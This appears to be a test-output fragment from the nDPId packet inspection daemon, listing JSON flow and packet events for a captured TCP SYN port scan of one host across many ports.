+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAscZcAACYGsNusEAAIQA2GNIzSEVzdUoMYAAAAAGACDAAbMwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAslUQAADkGei6sEAAIQA2GNIzSAE\/dUoMYAAAAAGACCAAwQAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsfT0AADYGlTWsEAAIQA2GNIzSHwLdUoMYAAAAAGACDAANjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAseaIAAC4GoNCsEAAIQA2GNIzSBAjdUoMYAAAAAGACDAAohwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtMAACcGAqCsEAAIQA2GNIzTCEfdU4MZAAAAAGACEAAgRQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1MAACsGdh+sEAAIQA2GNIzTH5XdU4MZAAAAAGACEAAI9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsELoAACkGDrmsEAAIQA2GNIzTFTjdU4MZAAAAAGACCAAbVAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaIAACcG79CsEAAIQA2GNIzTEV7dU4MZAAAAAGACEAAXLgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAszmMAADAGSg+sEAAIQA2GNIzTBFLdU4MZAAAAAGACBAAwOgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3kAADcGYfmsEAAIQA2GNIzTCGDdU4MZAAAAAGACEAAgLAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsoj0AACUGgTWsEAAIQA2GNIzTF0jdU4MZAAAAAGACCAAZRAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsj+cAACkGj4usEAAIQA2GNIzTBHLdU4MZAAAAAGACCAAsGgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4YAADsG3eysEAAIQA2GNIzTB\/rdU4MZAAAAAGACEAAgkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsgXEAACcGoAGsEAAIQA2GNIzTABPdU4MZAAAAAGACEAAoeQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1209,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAscfMAADcGn3+sEAAIQA2GNIzTOpjdU4MZAAAAAGACEADt8wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqgAADcG0sqsEAAIQA2GNIzTBEPdU4MZAAAAAGACEAAkSQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs3asAACwGPsesEAAIQA2GNIzTE+zdU4MZAAAAAGACBAAgoAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0oAADsGRiisEAAIQA2GNIzTAgzdU4MZAAAAAGACEAAmgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAst5EAADAGYOGsEAAIQA2GNIzSBPjdUoMYAAAAAGACBAAvlwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsk4oAADEGg+isEAAIQA2GNIzSIsPdUoMYAAAAAGACCAANzAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBsAACwG6FesEAAIQA2GNIzSBGHdUoMYAAAAAGACBAAwLgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0AAACYG3zKsEAAIQA2GNIzSJyjdUoMYAAAAAGACDAAFZwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsch0AADoGnFWsEAAIQA2GNIzSF3PdUoMYAAAAAGACDAAVHAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdEAACcGo6GsEAAIQA2GNIzSH5jdUoMYAAAAAGACEAAI9wAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060336,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_packet_id":1,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060336,"pkt":"ACYLMQczACWzv5HuCABFAAAs808AADYGHyOsEAAIQA2GNIzSoifdUoMYAAAAAGACDACKZwAAAgQFtA=="} 